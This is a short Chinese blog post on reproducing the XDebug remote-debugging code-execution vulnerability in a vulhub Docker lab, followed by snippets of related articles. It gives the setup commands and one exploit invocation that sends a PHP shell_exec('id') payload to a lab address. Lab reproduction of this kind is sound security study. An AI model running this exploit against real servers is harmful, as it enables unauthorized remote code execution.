XDebug 远程调试漏洞复现(代码执行)

最新推荐文章于 2025-06-16 10:59:09 发布
最新推荐文章于 2025-06-16 10:59:09 发布
阅读量2.9k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_58687645/article/details/122407141
本文介绍如何使用 Docker 搭建 Xdebug 远程代码执行 (RCE) 测试环境。主要内容包括启动 Docker 服务、进入指定目录、启动 Docker 容器并验证搭建是否成功。此外,还提供了在本地执行 EXP 脚本来测试远程代码执行漏洞的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建

启动docker

systemctl start docker

进入对应目录

cd vulhub/php/xdebug-rce/
启动容器

docker-compose up -d
查看容器

docker ps

访问8080端口(搭建成功)

在本机执行exp
exp的位置在vulhub/php/xdebug-rce/目录下(成功执行)

python3 exp.py -t http://10.106.8.91:8080/index.php  -c 'shell_exec('id');'

 

安全菜
关注
漏洞复现】JDWP远程命令执行漏洞
weixin_43486390的博客
03-02 8050
0x01 漏洞描述 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDI(Java Debug Interface):Java库接口,实现了JDWP协议的客户端,调试器可以用来和远程调试应用通信。 JDWP(Java
XDebug 远程调试漏洞 代码执行 漏洞复现
ADummy的博客
02-26 808
XDebug 远程调试漏洞代码执行) by ADummy 0x00利用路线 ​ 构造XXE payload—>POST发送—>有回显(也有blind xxe 参考资料) 0x01漏洞介绍 ​ XDebugPHP的一个扩展,用于调试PHP代码。如果目标开启了远程调试模式,并设置remote_connect_back = 1: xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 这个配置下,我们访问http://target/
PHP开发900个实用技巧】200.Xdebug函数追踪: 像侦探一样跟踪代码执行路径!
06-16 721
Xdebug函数追踪全攻略:从调试菜鸟到代码侦探》 本文系统讲解PHP调试神器Xdebug的核心使用方法。通过侦探破案类比,将枯燥的调试过程转化为有趣的技术探索: 1️⃣ 基础篇:揭示Xdebug的核心价值,对比传统echo调试的局限性 2️⃣ 避坑指南:分析递归卡死、生产环境滥用等常见误区 3️⃣ 实战配置:提供三分钟快速安装方案和IDE对接技巧 4️⃣ 案例解析:以电商购物车bug为例演示全流程追踪 5️⃣ 高阶技巧:分享大变量处理、API日志记录等进阶方案 文章包含5个技术要点图解、6个典型错误案例
XDebug 远程调试漏洞代码执行
黑白的博客
12-27 1815
声明 好好学习,天天向上 漏洞描述 XDebugPHP的一个扩展,用于调试PHP代码。如果目标开启了远程调试模式,并设置remote_connect_back = 1: xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 这个配置下,我们访问http://target/index.php?XDEBUG_SESSION_START=phpstorm,目标服务器的XDebug将会连接访问者的IP(或X-Forwarded-For头指定的地址)并通过
PHP远程调试XDEBUG
10-23
开发的时候我都是使用XDebug在本地调试,但是最近加入一些项目中去,环境太复杂了,要在本地搭建一个开发环境真的太麻烦了,那么我们怎么使用xdebug远程调试呢?下面通过本篇文章给大家介绍php xdebug远程调试方法,感兴趣的朋友一起看看吧
远程调试XDebug
Mr_Rongyao的博客
08-26 538
我这里之前已经装了。
xdebug 代码执行复现
最新发布
07-05
用户意图可能是要复现Xdebug代码执行漏洞,或者学习如何使用Xdebug进行远程调试。由于引用[1]直接提到了一个代码注入漏洞,我应该优先考虑如何复现这个漏洞。引用[2]、[3]、[4]提供了远程调试的背景,这可能与漏洞...
JDWP远程命令执行漏洞
玄道的网安博客
03-09 1741
简介 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用。 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDI(Java Debug Interface):Java库接口,实现了JDWP协议的客户端,调试器可以用来和远程调试应用通...
远程调试Java EE应用:NetBeans远程调试技巧全解析
随着企业级应用的快速发展,远程调试已成为日常开发中不可或缺的环节。它是解决跨地域、跨环境问题的有力工具,能够帮助开发者在不影响产品实际运行环境的情况下,深入理解应用行为,高效定位问题根源。 ## 1.2 ...
vulfocus在线靶场:xdebug代码执行 速通手册
m0_47484034的博客
11-20 277
vulfocus在线靶场:xdebug代码执行 速通手册
xdebug远程调试
许发君博客
01-02 1035
安装xdebug 见我另外一篇文章:PHP安装xdebug 配置项 xdebug.remote_enable = 1 ; 开启远程调试,必须设置为1 xdebug.idekey = PHPSTORM ; 可选设置, xdebug.remote_connect_back = 1 ; 如果PHPStorm在本地,请设置为1,不然本地检测不到 设置phpstorm相关配置...
PHP使用Xdebug进行远程调试
weixin_34308389的博客
09-08 476
PHP使用Xdebug进行远程调试 翻译bymylxswposted on 2014/07/14 under技术文章 > 编程语言 Xdebug提供了客户端与PHP脚本进行交互的接口,这一章将会介绍如何让PHPXdebug开启这个特性,并且介绍一些常用的客户端。 概述 Xdebug(远程)调试器允许测试数据结构,步进并且调试你的代...
buuctf [PHP]XDebug RCE
qq_1873822的博客
03-22 849
打开页面是一个phpinfo XDebugPHP的一个扩展,用于调试PHP代码。 然后可以直接去找lflag,这里复现失败了,原因是该通信是一个反向连接的过程,exp.py启动后其实是会监听本地的9000端口(可通过-l参数指定)并等待XDebug前来连接,所以执行该脚本的服务器必须有外网IP(或者与目标服务器处于同一内网)。 文章学习参考https://blog.youkuaiyun.com/weixin_43416469/article/details/114143522 ...
代码调式及 Xdebug的配置使用
qq_62344745的博客
04-13 223
Xdebug是一个开源的PHP程序调试工具,可以使用它来调试、跟踪及分析程序运行状态。
利用恶意页面攻击本地 Xdebug
m0_59598029的博客
02-06 131
TL;DRPHP开发者以及一些安全研究人员经常会在本地搭建一个基于XdebugPHP调试服务,在大部分配置情况下,Xdebug采用HTTP请求头中的字段作为DBGp协议的回连地址。受害者浏览攻击页面一段时间,攻击者可利用DNS Rebind技术向本地服务器发送带有恶意的请求,即有可能在受害者电脑上执行任意代码。Xdebug是用于调试PHP的扩展,可以根据本地源码远程调试服务器上的PHP代码。很多开发者和安全研究人员通常会在本地搭建一套PHP调试环境,用于日常的开发和调试
HITCON 2018 BabyCake WriteUp && XDebug + VSCode远程调试
heySister
11-22 1111
哦,终于把这道题目搞定了,写一下我的复现过程,主要是配了一下Xdebug的环境,因为手抖耽误了很多时间。 先贴一下docker: docker pull gaoxijiejie/babycake 下载好之后运行指令为: docker run -id --name cake-xdebug -p 8080:80 -p 9009:9009 cake-xdebug /bin/bash (xdebug使用的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值